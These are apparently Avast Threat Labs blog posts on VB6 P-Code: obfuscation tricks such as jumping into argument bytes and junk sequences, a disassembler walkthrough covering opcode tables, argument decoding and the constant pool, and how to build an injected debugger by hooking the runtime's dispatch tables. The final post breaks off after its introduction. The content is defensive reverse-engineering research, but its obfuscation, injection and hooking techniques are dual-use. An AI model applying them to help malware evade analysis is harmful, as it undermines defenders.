
VB6 P-Code Obfuscation

28 April 2021 at 09:37

Code obfuscation is one of the cornerstones of malware. The harder code is to analyze, the longer attackers can fly below the radar and hide the full capabilities of their creations.

Code obfuscation techniques are very old and take many forms, from source code modifications and opcode manipulations to packer layers, virtual machines, and more.

Obfuscations are common amongst native code, script languages, .NET IL, and Java byte code.

As a defender, it’s important to be able to recognize these types of tricks, and have tools that are capable of dealing with them. Understanding the capabilities of the medium is paramount to determine what is junk, what is code, and what may simply be a tool error in data display. 

On the attacker's side, developing a code obfuscation has certain prerequisites. The attacker needs tooling and documentation that allow them to craft and debug the complex code flow.

For binary implementations such as native code or IL, this would involve specs of the target file format, documentation on the opcode instruction set, disassemblers, assemblers, and a capable debugger.

One of the code formats that has not seen common obfuscation has been the Visual Basic 6 P-Code byte streams. This is a proprietary opcode set, in a complex file format, with limited tooling available to work with it. 

In the course of exploring this instruction set certain questions arose:

  • Can VB6 P-Code be obfuscated at the byte stream layer? 
  • Has this occurred in samples in the wild?
  • What would this look like?
  • Do we have tooling capable of handling it?


Before we continue, we will briefly discuss the VB6 P-Code format and the tools available for working with it.

VB6 P-Code is a proprietary, variable length, binary instruction set that is interpreted by the VB6 Virtual Machine (msvbvm60.dll).

In terms of documentation, Microsoft has never published details of the VB6 file format or opcode instruction set. The opcode handler names were gathered by reversers from the debug symbols released with only a handful of runtime versions. 

At one time there was a reversing community dedicated to the VB6 file format and P-Code instruction set. Mirrors of this message board are still available today [1]. 

On the topic of tooling, the main tools are p32Disasm, VB-Decompiler, Semi-Vbdecompiler, and the WKTVBDE P-Code debugger.

Of these only Semi-Vbdecompiler shows you the full argument byte stream, the rest display only the opcode byte. While several private P-Code debuggers exist, WKTVBDE is the only public tool with debugging capabilities at the P-Code level. 

The opcode meanings themselves are still widely undocumented at this point. Beyond intuition from their names, you would really have to compile your own programs from source, disassemble them, disassemble the opcode handlers, and debug both the native runtime and P-Code to get a firm grasp of what's going on. 

As you can glimpse, there is a great deal of information required to make sense of P-Code disassembly and it is still a pretty dark art for most reversers. 

Do VB6 obfuscators exist?

While doing research for this series of blog posts we started with an initial sample set of 25,000 P-Code binaries which we analyzed using various metrics. 

Common tricks VB6 malware uses to obfuscate their intent include:

  • junk code insertion at source level
  • inclusion of large bodies of open source code to bulk up binary
  • randomized internal object and method names 
    • most commonly done at the pre-compilation stage
    • some tools work post compilation.
  • all manner of encoded strings and data hiding
  • native code blobs launched with various tricks such as CallWindowProc

To date, we have not yet documented P-Code level manipulations in the wild. 

Due to the complexity of the vector, P-Code obfuscations could easily have gone undetected to date, which made it an interesting area to research. Hunting for samples will continue.

Can VB P-Code even be obfuscated and what would that look like?

In the course of research, this was a natural question to arise. We also wanted to make sure we had tooling which could handle it. 

Consider the following VB6 source:

The default P-Code compilation is as follows:

An obfuscated sample may look like the following:

From the above we see multiple opcode obfuscation tricks commonly seen in native code.

It has been verified that this code runs fine and does not cause any problems with the runtime. This mutated file has been made available on Virustotal in order for vendors to test the capabilities of their tooling [2]. 

To single out some of the tricks:

Jump over junk:

Jumping into argument bytes:

At runtime what executes is:

Do nothing sequences:

Invalid sequences which may trigger fatal errors in disassembly tools:


The easiest markers of P-Code obfuscation are:

  •     jumps into the middle of other instructions
  •     unmatched for/next opcodes counts
  •     invalid/undefined opcodes 
  •     unnatural opcode sequences not produced by the compiler
  •     errors in argument resolution from randomized data 
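The first of these markers lends itself to a mechanical check. Below is a hypothetical sketch, assuming a disassembler has already produced instruction offsets and jump targets; the function name and tuple layout are illustrative, not from any real tool:

```python
# Hypothetical detector: flag jump targets that land inside another
# instruction's byte range (a classic sign of P-Code obfuscation).

def find_mid_instruction_jumps(instructions, jumps):
    """instructions: sorted list of (start_offset, length) tuples.
    jumps: list of jump targets, relative to the function start.
    Returns targets that fall inside, but not at the start of, an instruction."""
    starts = {off for off, _ in instructions}
    suspicious = []
    for target in jumps:
        for off, length in instructions:
            if off < target < off + length and target not in starts:
                suspicious.append(target)
                break
    return suspicious

# Example: a 2-byte instruction at 0 and a 4-byte one at 2; a jump to
# offset 3 lands inside the second instruction's argument bytes.
insns = [(0, 2), (2, 4), (6, 1)]
print(find_mid_instruction_jumps(insns, [2, 3]))  # [3]
```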

Some junk sequences such as Not Not can show up normally depending on how a routine was coded.

This level of detection will require a competent, error-free disassembly engine that is aware of the full structures within the VB6 file format. 


Code obfuscation is a fact of life for malware analysts. The more common and well documented the file format, the more likely that obfuscation tools are widespread in the wild.

This reasoning is likely why complex formats such as .NET and Java had many public obfuscators early on.

This research proves that VB6 P-Code obfuscation is equally possible and gives us the opportunity to make sure our tools are capable of handling it before being required in a time-constrained incident response. 

The techniques explored here also grant us the insight to hunt for advanced threats which may already have been using this technique and flown under the radar for years.

We encourage researchers to examine the mutated sample [2] and make sure that their frameworks can handle it without error.


[1] mirror

[2] Mutated P-Code sample SHA256 and VirusTotal link

The post VB6 P-Code Obfuscation appeared first on Avast Threat Labs.

VB6 P-Code Disassembly

5 May 2021 at 05:48

In this article we are going to discuss the inner depths of VB6 P-Code disassembly and the VB6 runtime.

As a malware analyst, VB6 in general, and P-Code in particular, has always been a problem area. It is not well documented and the publicly available tooling did not give me the clarity I really desired.

In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [1]. Microsoft has been kind enough to provide debug symbols with this version for the .ENGINE P-Code handlers.

To really delve into this topic we are going to have to cover several areas.

The general layout will cover:

  • how the runtime executes a P-Code stream
  • how P-Code handlers are written
  • primer on the P-Code instruction set
  • instruction groupings
  • internal runtime conventions
  • how to debug handlers

Native Opcode Handlers & Code Flow

Let’s start with how a runtime handler interprets the P-Code stream.

Future articles will detail how the transition is made from native code to P-Code. For our purposes here, we will look at individual opcode handlers once the P-Code interpretation has already begun.

For our first example, consider the following P-Code disassembly:

Here we can see two byte codes at virtual address 0x401932. These have been decoded to the instruction LitI2_Byte 255. 0xF4 is the opcode byte. 0xFF is the hardcoded argument passed in the byte stream. 

The opcode handler for this instruction is the following:

While in a handler, the ESI register will always start as the virtual address of the next byte to interpret. In the case above, it would be 0x401933 since the 0xF4 byte has already been processed to get us into this handler.

The first instruction at 0x66105CAB will load a single byte from the P-Code byte stream into the EAX register. This value is then pushed onto the stack. This is the functional operation of this opcode.

EAX is then cleared and the next value from the byte stream is loaded into the lower part of EAX (AL). This will be the opcode byte that takes us to the next native handler.

The byte stream pointer is then incremented by two. This will set ESI past the one byte argument, and past the next opcode which has already been consumed.

Finally, the jmp instruction will transfer execution to the next handler by using the opcode as an array index into a function pointer table.
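To make the flow concrete, here is a minimal Python model of the handler just described. The function name and the stream/stack representation are my own; ESI is modeled as a simple index into the byte stream:

```python
# Sketch (names hypothetical) of the LitI2_Byte handler logic:
# push a one-byte literal, fetch the next opcode, advance ESI by two.

def lit_i2_byte(stream, esi, stack):
    """esi points just past the 0xF4 opcode byte, as in the runtime."""
    arg = stream[esi]          # movzx eax, byte [esi] : the literal argument
    stack.append(arg)          # push eax : functional operation of the opcode
    next_op = stream[esi + 1]  # load the next opcode byte into AL
    esi += 2                   # skip the argument and the consumed opcode
    return esi, next_op        # jmp tblByteDisp[next_op * 4]

stream = bytes([0xF4, 0xFF, 0x04])  # LitI2_Byte 255, then opcode 0x04
stack = []
esi, next_op = lit_i2_byte(stream, 1, stack)
print(stack, esi, hex(next_op))  # [255] 3 0x4
```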

Now that last sentence is a bit of a mouthful, so let's include an example. Below are the first few entries from the _tblByteDisp table. This table is an array of 4 byte function pointers.

Each opcode is an index into this table. The *4 in the jump statement is because each function pointer is 4 bytes (32 bit code).

The only way we know the names of each of these P-Code instructions is because Microsoft included the handler names in the debug symbols for a precious few versions of the runtime. 

The snippet above also reveals several characteristics of the opcode layout to be aware of. First, note that there are invalid slots such as opcode 0x01 - InvalidExCode. The reason for this is unknown, but it also means we can have some fun with the runtime, such as introducing our own opcodes [5].

The second thing to notice is that multiple opcodes can point to the same handlers such as the case with lblEX_Bos. Here we see that opcode 0 leads to the same place as opcode 2. There are actually 5 opcode sequences which point to the BoS (Beginning of Statement) handler.

The next thing to notice is that the opcode names are abbreviated and will require some deciphering to learn how to read them. 

Finally from the LitI2_Byte handler we already analyzed, we can recognize that all of the stubs were hand written in assembler. 

From here, the next question is how many handlers there are. If each opcode is a single byte, there can only be a maximum of 256 handlers, right? That would make sense, but is incorrect.

If we look at the last 5 entries in the _tblByteDisp table we find this:

The handler for each of these looks similar to the following:

Here we see EAX zeroed out, the next opcode byte loaded into AL and the byte code pointer (ESI) incremented. Finally it uses that new opcode to jump into an entirely different function pointer table.

This would give us a maximum opcode count of (6*256)-5 or 1531 opcodes.

Now luckily, not all of these opcodes are defined. Remember some slots are invalid, and some are duplicate entries. If we go through and eliminate the noise, we are left with around 822 unique handlers. Still nothing to sneeze at.

So what the above tells us is that not all instructions can be represented as a single opcode. Many instructions will be prefixed with a lead byte that then makes the actual opcode reference a different function pointer table.

Here is a clip from the second tblDispatch pointer table:

To reach lblEX_ImpUI1 we would need to encode 0xFB as the lead byte and 0x01 as the opcode byte.

This would first send execution into the _lblBEX_Lead0 handler, which then loads the 0x01 opcode and uses tblDispatch table to execute lblEX_ImpUI1.
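As a sketch, the two-level dispatch can be modeled as a flat numbering scheme. Only the 0xFB lead byte is confirmed above; the remaining lead byte values are assumed for illustration:

```python
# Hypothetical numbering sketch: flatten a (lead byte, opcode) pair into
# a single instruction index, mirroring the six-table layout described
# above. Lead byte slots 0xFC-0xFF are assumptions.

LEADS = {0xFB: 1, 0xFC: 2, 0xFD: 3, 0xFE: 4, 0xFF: 5}

def flat_index(lead, opcode):
    """lead=None means a base-table (single byte) instruction."""
    table = 0 if lead is None else LEADS[lead]
    return table * 256 + opcode

print(flat_index(None, 0xF4))  # 244 -> base table, LitI2_Byte
print(flat_index(0xFB, 0x01))  # 257 -> tblDispatch, lblEX_ImpUI1
print(6 * 256 - 5)             # 1531, the maximum opcode count
```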

A little bit confusing, but once you see it in action it becomes quite clear. You can watch it run live for yourself by loading a P-Code executable into a native debugger and setting a breakpoint on the lead* handlers.

Byte stream argument length  

Before we can disassemble a byte stream, we also need to know how many byte code arguments each and every instruction takes. With 822 instructions this can be a big job! Luckily other reversers have already done much of the work for us. The first place I saw this table published was from Mr Silver and Mr Snow in the WKTVBDE help file.

A codified version of this can be found in the Semi-VbDecompiler source [2] which I have used as a reference implementation. The opcode sizes are largely correct in this table, however some errors are still present. As with any reversing task, refinement is a process of trial and error. 

Some instructions, 18 known to date, have variable length byte stream arguments. The actual size of the byte stream to consume before the next opcode is embedded as the two bytes after the opcode. An example of this is the FFreeVar instruction.

In this example we see the first two bytes decode as 0x0008 (little endian format), which here represents 4 stack variables to free.

Opcode Naming Conventions

Before we continue on to opcode arguments, I will give a brief word on naming conventions and opcode groupings.

In the opcode names you will often see a combination of the following abbreviations. The below is my current interpretation of the less intuitive specifiers:

Opcode abbreviation Description
Imp Import
Ad Address
St / Ld Store / Load
I2 Integer/Boolean
I4 Long
UI1 Byte
Lit Literal(ie “Hi”,2,8 )
Cy Currency
R4 Single
R8 Double
Str String
Fn Calls a VBA export function
FPR Floating point register
PR Uses ebp-4C as a general register
Var Variant
Rf Reference
VCall VTable call
LateID Late bound COM object call by method ID
LateNamed Late bound COM Object call by method name

Specifiers are often combined to denote meaning and opcodes often come in groups such as the following:

An opcode search interface such as this is very handy while learning the VB6 instruction set.

Opcode Groups

The following shows an example grouping:

Opcode abbreviation Description
ForUI1 Start For loop with byte as counter type
ForI2 With integer counter, default step = 1
ForI4 Long type as counter
ForStepUI1 For loop with byte counter, user specified step
ForEachCollVar For each loop over collection using variant
ForEachAryVar For each loop over array using variant
ForEachCollObj For each loop over collection using object type

A two part series on the intricacies of how For loops were implemented is available [3] for the curious.

As you can see, the opcode set can collapse down fairly well once you take into account the various groupings. While I have grouped the instructions in the source, I do not have an exact number as the lines between them can still be a bit fuzzy. It is probably around 100 distinct operations once grouped.

Now onto the task of argument decodings. I am not sure why, but most P-Code tools only show you the lead byte, opcode byte, and mnemonic. Resolved arguments are displayed only if the opcode is fully handled. 

Everything except Semi-VBDecompiler [6] skips the display of the argument bytes.

The problem arises from the fact that no tool yet decodes all of the arguments correctly for all of the opcodes. If you do not see the argument byte stream, there is no indication other than a subtle jump in virtual address that anything has been hidden from you. 

Consider the following displays:

The first version shows you opcode and mnemonic only. You don’t even realize anything is missing. The second version gives you a bigger hint and at least shows you no argument resolution is occurring. The third version decodes the byte stream arguments, and resolves the function call to a usable name.

Obviously the third version is the gold standard we should expect from a disassembler. The second version can be acceptable and shows something is missing. The first version leaves you clueless. If you are not already intimately familiar with the instruction set, you will never know you are missing anything.

Common opcode argument types

In the Semi-VbDecompiler source many opcodes are handled with custom printf type specifiers [4]. Common specifiers include:

Format specifier Description
%a Local argument
%l Jump location
%c Proc / global var address stored in constant pool
%e Pool index as P-Code proc to call
%x Pool index to locate external API call
%s Pool index of string address
%1/2/4 Literal byte, int, or long value
%t Code object from its base offset
%v VTable call
%} End of procedure

Many opcodes only take one or more simple arguments, %a and %s being the most common.

Consider "LitVarStr %a %s" which loads a variant with a literal BSTR string, and then pushes that address to the top of the stack:

The %a decoder will read the first two bytes from the stream and decode it as follows:

Interpreting 0xFF68 as a signed 2-byte number gives -0x98. Since it is a negative value, it is a local function variable at ebp-0x98. Positive values denote function arguments. 

Next, the %s handler will read the next two bytes, which it interprets as a pool index. The value at pool index 0 is the constant 0x40122C. This address contains an embedded BSTR, where the address points to the Unicode part of the string and the preceding 4 bytes denote its length.
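The two decoders for "LitVarStr %a %s" can be sketched as follows. The pool contents and function names are illustrative; only the decoding rules come from the description above:

```python
import struct

# Sketch of the %a and %s argument decoders described above.

def decode_a(stream, off):
    """%a: signed 16-bit; negative = local variable, positive = argument."""
    val = struct.unpack_from('<h', stream, off)[0]
    where = 'local' if val < 0 else 'argument'
    return off + 2, f'{where} ebp{val:+#x}'

def decode_s(stream, off, pool):
    """%s: unsigned 16-bit constant pool index -> BSTR address."""
    idx = struct.unpack_from('<H', stream, off)[0]
    return off + 2, pool[idx]

pool = {0: 0x40122C}                     # assumed constant pool entry
stream = bytes.fromhex('68ff' '0000')    # %a = 0xFF68, %s = pool index 0
off, var = decode_a(stream, 0)
off, addr = decode_s(stream, off, pool)
print(var, hex(addr))  # local ebp-0x98 0x40122c
```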

A closer look at run time data for this instruction is included in the debugging section later on.

Another common specifier is the %l handler used for jump calculations. It can be seen in the following examples:

In the first unconditional jump the byte stream argument is 0x002C. Jump locations are all referenced from the function start address, not the current instruction address as may be expected. 

0x4014E4 + 0x2C = 0x401510 
0x4014E4 + 0x3A = 0x40151E

Since all jumps are calculated from the beginning of a function, the offsets in the byte stream must be interpreted as unsigned values. Jumps to addresses before the function start are not possible and represent a disassembly error. 
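The %l rule reduces to a one-line calculation, sketched here with the example values from above (the function name is my own):

```python
# Sketch of the %l jump decoder: offsets are unsigned and relative to
# the function start address, not the current instruction.

def jump_target(func_start, raw_offset):
    # unsigned: jumps before the function start are not possible,
    # so a "negative" interpretation would be a disassembly error
    assert 0 <= raw_offset <= 0xFFFF
    return func_start + raw_offset

print(hex(jump_target(0x4014E4, 0x2C)))  # 0x401510
print(hex(jump_target(0x4014E4, 0x3A)))  # 0x40151e
```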

Next, let's consider the %x handler as we revisit the "ImpAdCallFPR4 %x" instruction:

The native handler for this is:

Looking at the P-Code disassembly we can see the byte stream of 24001000 is actually two integer values. The first 0x0024 is a constant pool index, and the second 0x0010 is the expected stack adjustment to verify after the call. 
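A %x decoder is then just two little-endian words, as in this sketch (function name illustrative):

```python
import struct

# Sketch of the %x decoder: a constant pool index followed by the
# expected stack adjustment to verify after the call.

def decode_x(stream, off):
    pool_index, stack_adjust = struct.unpack_from('<HH', stream, off)
    return off + 4, pool_index, stack_adjust

# the byte stream 24001000 from the example above
_, idx, adj = decode_x(bytes.fromhex('24001000'), 0)
print(hex(idx), hex(adj))  # 0x24 0x10
```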

Now we haven’t yet talked about the constant pool or the housekeeping area of the stack that VB6 reserves for state storage. For an abbreviated description, at runtime VB uses the area between ebp and ebp-94h as kind of a scratch pad. The meanings of all of these fields are not yet fully known; however, several of the key entries are as follows:

Stack position Description
ebp-58 Current function start address
ebp-54 Constant pool
ebp-50 Current function raw address (RTMI structure)
ebp-4C PR (Pointer Register) used for Object references

In the above disassembly we can see entry 0x24 from the constant pool would be loaded.

A constant pool viewer is a very instructive tool to help decipher these argument byte codes.

It has been found that smart decoding routines can reliably decipher constant pool data independent of analysis of the actual disassembly.

One such implementation is shown below:

If we look at entry 0x0024 we see it holds the value 0x4011CE. If we look at this address in IDA we find the following native disassembly:

0x40110C is the IAT address of msvbvm60.rtcImmediateIf import. This opcode is how VB runtime imports are called. 

While beyond the scope of this paper, it is of interest to note that VB6 embeds a series of small native stubs in P-Code executables to splice together the native and P-Code executions. This is done for API calls, call backs, inter-modular calls etc. 

The Constant Pool

The constant pool itself is worth a bit of discussion. Each compilation unit such as a module, class, or form gets its own constant pool, which is shared by all of the functions in that file. 

Pool entries are built up on demand as the file is processed by the compiler from top to bottom. 

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets
  • blank slots which represent internal COM objects filled out at startup by the runtime (ex: App.)

More advanced opcode processors

More complex argument resolutions require a series of opcode post processors. In the disassembly engine I am working on there are currently 13 post processors which handle around 30 more involved opcodes.

Things start to get much more complex when we deal with COM object calls. Here we have to resolve the COM class ID, interface ID, and discern its complete VTable layout to determine which method is going to be called. This requires access to the COM object's type library if it's an external type, and the ability to recreate its function prototype from that information.

For internal types such as user classes, forms and user controls, we also need to understand their VTable layout. For internal types however we do not receive the aid of tlb files. Public methods will have their names embedded in the VB file format structures which can be of help.

Resolution of these types of calls is beyond the scope of what we can cover in an introductory paper, but it is absolutely critical to get right if you are writing a disassembler that people are going to rely upon for business needs.

More on opcode handler inputs

Back to opcode arguments. It is also important to understand that opcodes can take dynamic runtime stack arguments in addition to the hard coded byte stream arguments. This is not something that a disassembler necessarily needs to understand though. This level of knowledge is mainly required to write P-Code assembly or a P-Code decompiler. 

Some special cases however do require the context of the previous disassembly in order to resolve properly. Consider the following multistep operation:

Here the LateIdLdVar resolver needs to know which object is being accessed. Scanning back and locating the VCallAd instruction is required to find the active object stored in PR.

Debugging handlers

When trying to figure out complex opcode handlers, it is often helpful to watch the code run live in a debugger. There are numerous techniques available here. Watching the handler itself run requires a native debugger. 

Typically you will figure out how to generate the opcode with some VB6 source which you compile. You then put the executable in the same directory as your reference copy of the vb runtime and start debugging. 

Some handlers are best viewed in a native debugger, however many can be figured out just by watching it run through a P-Code debugger. 

A P-Code debugger simplifies operations showing you its execution at a higher level. In one step of the debugger you can watch multiple stack arguments disappear, and the stack diff light up with changes to other portions. Higher level tools also allow you to view complex data types on the stack as well as examine TLS memory and keep annotated offsets. 

In some scenarios you may actually find yourself running both a P-Code debugger and a native debugger on the target process at the same time. 

One important thing to keep in mind is that VB6 makes heavy use of COM types. 

Going back to our LitVarStr example:

You would see the following after it executes:

0019FC28 ebp-120 0x0019FCB0 ; ebp-98 - top of stack 
0019FCB0 ebp-98 0x00000008 
0019FCB4 ebp-94 0x00000000  
0019FCB8 ebp-90 0x0040122C

A data viewer would reveal the following when decoding ebp-98 as a variant:

Variant 19FCB0 
VT: 0x8( Bstr ) 
Res1: 0 
Res2: 0 
Res3: 0 
Data: 40122C 
String len: 9 -> never hit
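A viewer for that dump can be sketched with a struct unpack over the standard 16-byte OLE VARIANT layout (vt word, three reserved words, then the data); the names below are my own:

```python
import struct

# Sketch of decoding the 16-byte VARIANT shown above.

VT_NAMES = {8: 'Bstr'}  # only the type used in this example

def decode_variant(raw):
    vt, r1, r2, r3, data = struct.unpack_from('<HHHHI', raw, 0)
    return {'vt': VT_NAMES.get(vt, hex(vt)),
            'reserved': (r1, r2, r3),
            'data': data}

# rebuild the stack contents from the dump: VT 0x8, data 0x40122C
raw = struct.pack('<HHHHI4x', 0x8, 0, 0, 0, 0x40122C)
v = decode_variant(raw)
print(v['vt'], hex(v['data']))  # Bstr 0x40122c
```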

Debugging VB6 apps is a whole other ball of wax. I mention it here only in passing to give you a brief introduction to what may be required when deciphering what opcodes are doing. In particular recognizing Variants and SafeArrays in stack data will serve you well when working with VB6 reversing.


In this paper we have laid the necessary ground work in order to understand the basics of a VB6 P-Code disassembly engine. The Semi-VbDecompiler source is a good starting point to understand its inner workings. 

We have briefly discussed how to find and read native opcode handlers along with some of the conventions necessary for understanding them. We introduced you to how opcodes flow from one to the next, along with how to determine the number of byte stream arguments each one takes, and how to figure out what they represent. 

There is still much work to be done in terms of documenting the instruction set. I have started a project where I catalog:

  • VB6 source code required to generate an opcode
  • byte stream arguments size and meaning
  • stack arguments consumed
  • function outputs

Unfortunately it is still vastly incomplete. This level of documentation is foundational and quite necessary for writing any P-Code analysis tools.

Still to be discussed, is how to find the actual P-Code function blobs within the VB6 compiled executable. This is actually a very involved task that requires understanding a series of complex and nested file structures. Again the Semi-VbDecompiler source can guide you through this maze.

While VB6 is an old technology, it is still commonly used for malware. This research is aimed at reducing gaps in understanding around it and is also quite interesting from a language design standpoint. 

[1] – VB6 runtime with symbols
[2] – Semi-VbDecompiler opcode table Source
[3] – A closer look at the VB6 For Loop implementation
[4] – Semi-VBDecompiler opcode argument decodings 
[5] – Introducing a one byte NOP opcode
[6] – Semi-VBDecompiler

The post VB6 P-Code Disassembly appeared first on Avast Threat Labs.

Writing a VB6 P-Code Debugger

12 May 2021 at 12:46


In this article we are going to discuss how to write a debugger for VB6 P-code. This has been something I have always wanted to do ever since I first saw the WKTVBDE P-Code Debugger written by Mr Silver and Mr Snow back in the early 2000s.

There was something kind of magical about that debugger when I first saw it. It was early in my career, I loved programming in VB6, and reversing it was a mysterious dark art.

While on sabbatical, I finally found the time to sit down and study the topic in depth. I am now sharing what I discovered along the way.

This article will build heavily on the previous paper titled VB P-Code Disassembly[1]. In this paper we detailed how the run time processes P-Code and transfers execution between the different handlers.

It is this execution flow that we will target to gain control with our debugger.

An example of the debugger architecture detailed in this paper can be found in the free vbdec P-Code disassembler and debugger.


When I started researching this topic I wanted to first examine what a process running within the WKTVBDE P-Code debugger looked like.

A test P-Code executable was placed alongside a copy of the VB runtime with debug symbols[2]. The executable was launched under WKTVBDE and then a native debugger was attached.

Examining the P-Code function pointer tables at 0x66106D14 revealed all the pointers had been patched to a single function inside the WKTVBDE.dll.

This gives us our first hint at how they implemented their debugger. It is also worth noting at this point that the WKTVBDE debugger runs entirely within the process being debugged, GUI and all!

To start the debugger, you run loader.exe and specify your target executable. It will then start the process and inject the WKTVBDE.dll within it. Once loaded WKTVBDE.dll will hook the entire base P-Code handler table with its own function giving it first access to whatever P-Code is about to execute.

The debugger also contains:

  • a P-Code disassembler
  • ability to parse all of the nested VB internal structures
  • ability to list all code objects and control events (like on timer or button click)

This is in addition to the normal debugger UI actions such as data dumping, breakpoint management, stack display etc.

This is A LOT of complex code to run as an injection dll. Debugging all of this would have been quite a lot of work for sure.

With a basic idea of how the debugger operated, I began searching the web to find any other information I could. I was happy to find an old article by Mr Silver on Woodmann that I have mirrored for posterity [3].

In this article Mr Silver lays out the history of their efforts in writing a P-Code debugger and gives a template of the hook function they used. This was a very interesting read and gave me a good place to start.

Design Considerations:

Looking forward there were some design considerations I wanted to change in this architecture.

The first change would be that I would want to move all of the structure parsing, disassembler engine, and user interface code into its own stand alone process. These are complicated tasks and would be very hard to debug as a DLL injection.

To accomplish this task we need an easy to use, stable inter-process communication (IPC) technique that is inherently synchronous. My favorite technique in this category is using Windows Messages which automatically cause the external process to wait until the window procedure has completed before it returns.

I have used this technique extensively to stall malware after it unpacks itself [4]. I have even wired it up to a Javascript engine that interfaces with a remote instance of IDA [5].

This design will give us the opportunity to freely write and debug the file format parsing, disassembly engine, and user interface code completely independent of the debugger core.

At this point debugger integration essentially becomes an add on capability of the disassembler. The injection dll now only has to intercept execution and communicate with the main interface.

For the remainder of this paper we will assume that a fully operational disassembler has already been created and only focus on the debugger specific details.

For discussions on how to implement a disassembler and a reference implementation on structure parsing please refer to the previous paper [1].


With sufficient information now in hand it was time to start experimenting with gaining control over the execution flow.

Our first task is figuring out how to hook the P-Code function pointer table. Before we can hook it, we actually need to be able to find it first! This can be accomplished in several ways. From the WKTVBDE authors' paper it sounds like they progressed in three main stages. First, they started with a manually patched copy of the VB runtime and the modified dll referenced in the import table.

Second, they progressed to a single supported copy of the runtime with hardcoded offsets to patch, with a loader now injecting the debugger dll into the target process. Finally, they added the ability to dynamically locate and patch the table regardless of runtime version.

This is a good experimental progression which they detail in depth. The second stage is readily accessible to anyone who can understand this paper and will work sufficiently well. I will leave the details of injection and hooking as an exercise to the reader.

The basic steps are:

  • set the memory writable
  • copy the original function pointer table
  • replace original handlers with your own hook procedures
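The steps above can be modeled abstractly, with a Python list standing in for the runtime's function pointer table. This is only a sketch of the control-flow idea; the real implementation patches native memory (hence the set-writable step, omitted here), and all names are illustrative:

```python
# Abstract model of hooking a dispatch table: copy the original
# pointers, then replace each slot with a hook that notifies the
# debugger before falling through to the real handler.

def hook_table(table, make_hook):
    original = list(table)            # copy the original function pointers
    for op in range(len(table)):
        table[op] = make_hook(op, original[op])
    return original                   # keep the copy to dispatch through

trace = []
def make_hook(op, orig):
    def hook(*args):
        trace.append(op)              # NotifyUI(): breakpoints, stepping...
        return orig(*args)            # ...then run the real opcode handler
    return hook

table = [lambda: 'bos', lambda: 'invalid']   # stand-in handlers
saved = hook_table(table, make_hook)
print(table[0](), trace)  # bos [0]
```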

The published sample also made use of self modifying code, which we will seek to avoid. To get around this we will introduce individual hook stubs, 1 per table, to record some additional data.

Before we get into the individual hook stubs, we notice they stored some run time/state information in a global structure. We will expand on this with the following:

From the hooking code you will notice that all of the base opcodes in the first table (excluding lead byte handlers) all received the same hook. The Lead_X bytes at the end each received their own procedure.

Below shows samples of the hook handlers for the first two tables. The other 4 follow the same pattern:

The hooks for each individual table configure the global VM structure fields for current lead byte and table base. The real meat of the implementation now starts in the universal hook procedure.

In the main PCodeHookProc you will notice that we call out to another function defined as: void NotifyUI().

It is in this function where we do things like check for breakpoints, handle single stepping, etc. This function then uses synchronous IPC to talk to the out-of-process debugger user interface.

The debugger UI will receive the step notification and then go into a wait loop until the user gives a step/go/stop command. This has the effect of freezing the debugee until the SendMessage handler returns. You can find a sample implementation of this in the SysAnalyzer ApiLogger source [6].

The reason we call out to another function from PCodeHookProc is because it is written as a naked function in assembler. Once free from this we can now easily implement more complex logic in C.

Further steps:

Once all of the hooks are implemented you still need a way to exercise control over the debuggee. When the code is being remotely frozen, the remote GUI is actually still free to send the frozen process new commands over a separate IPC back channel.

In this manner you can manage breakpoints, change step modes, and implement lookup services through runtime exports such as rtcTypeName.

The hook dll can also patch in custom opcodes. The code below adds our own one-byte NOP instruction at unused slot 0x01.
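As a minimal sketch of the idea, the toy table-driven dispatcher below patches a do-nothing handler into unused slot 0x01. The dispatcher and the other opcode values are invented for illustration; only the 0x01 slot number comes from the text above:

```c
#include <stddef.h>

typedef struct { const unsigned char *ip; int acc; int running; } vm_t;
typedef void (*op_fn)(vm_t *);

static void op_halt(vm_t *vm) { vm->running = 0; }
static void op_inc (vm_t *vm) { vm->acc++; }
static void op_nop (vm_t *vm) { (void)vm; }   /* our custom one-byte NOP */

static op_fn g_table[256];

/* In the real hook dll this would write a new handler pointer into the
   runtime's opcode table at the unused slot. */
void patch_in_nop(void)
{
    g_table[0x01] = op_nop;
}

static int run(const unsigned char *code)
{
    vm_t vm = { code, 0, 1 };
    while (vm.running)
        g_table[*vm.ip++](&vm);   /* fetch one opcode byte, dispatch */
    return vm.acc;
}

int demo(void)
{
    g_table[0x00] = op_halt;
    g_table[0x02] = op_inc;
    patch_in_nop();
    static const unsigned char code[] = { 0x02, 0x01, 0x02, 0x00 };
    return run(code);             /* INC, NOP, INC, HALT */
}
```

Because the NOP handler simply returns, the dispatch loop advances to the next opcode byte, which is exactly the behavior a one-byte NOP needs.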

As hinted at in the comments, features such as live patching of the current opcode, and “Set New Origin Here” type features are both possible. These are implemented by the debugger doing direct WriteProcessMemory calls to the global VM struct. The address of this structure was disclosed in initialization messages at startup.


Writing a P-Code debugger is a very interesting concept. It is something that I personally wanted to do for the better part of 20 years.

Once you see all the moving parts up close it is not quite as daunting as it may seem at first glance.

Having a working P-Code debugger is also a foundational step to learning how the P-Code instruction set really works. Being able to watch VB6 P-code run live with integrated stack diffing and data viewer tools is very instructive. Single stepping at this level of granularity gives you a much clearer, higher level overview of what is going on.

While the hook code itself is technically challenging, there are substantial tasks required up front just to get you into the game.

Prerequisites for this include:

  • accurate parsing of an undocumented file format
  • a solid disassembly engine for an undocumented P-Code instruction set
  • user interface that allows for easy data display and debugger control

For a reverse engineer, a project such as this is like candy. There are so many aspects to analyze and work on. So many undocumented things to explore. A puzzle with a thousand pieces.

What capabilities can be squeezed out of it? How much more is there to discover?

For me it is a pretty fascinating journey that also brings me closer to the language that I love. Hopefully these articles will inspire others and enable them to explore as well.

[1] – VB P-Code Disassembly
[2] – VB6 runtime with symbols (MD5: EEBEB73979D0AD3C74B248EBF1B6E770)
[3] – VB P-code Information by Mr Silver
[4] – ApiLogger – Breaking into Malware
[5] – IDA JScript
[6] – SysAnalyzer ApiLogger – freeze remote process

The post Writing a VB6 P-Code Debugger appeared first on Avast Threat Labs.

Binary Reuse of VB6 P-Code Functions

19 May 2021 at 10:12

Reusing binary code from malware is one of my favorite topics. Binary re-engineering and being able to bend compiled code to your will is really just an amazing skill. There is also something poetic about taking malware decryption routines and making them serve you.

